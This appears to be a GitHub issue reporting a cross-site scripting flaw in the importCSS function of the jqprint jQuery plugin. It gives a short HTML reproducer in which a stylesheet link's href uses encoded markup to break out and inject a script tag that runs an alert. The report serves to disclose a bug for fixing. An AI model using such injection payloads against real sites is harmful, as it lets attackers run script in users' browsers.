XSS in importCSS

Prepared stylesheet link may contain malicious `href `that must be properly escaped before writing it to the DOM. 

Reproducer: http://jsfiddle.net/x3stw1nh/4/

```html
<html>
<head>
  <link type='text/css' rel='stylesheet' href='about:blank&#x27;/&gt;&lt;script&gt;alert(&#x27;xss&#x27;);&lt;/script&gt;&lt;br' />
  <script>
  $("body").jqprint();
  </script>
</head>
<body>
test
</body>
</html>
```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XSS in importCSS #12

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

XSS in importCSS #12

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions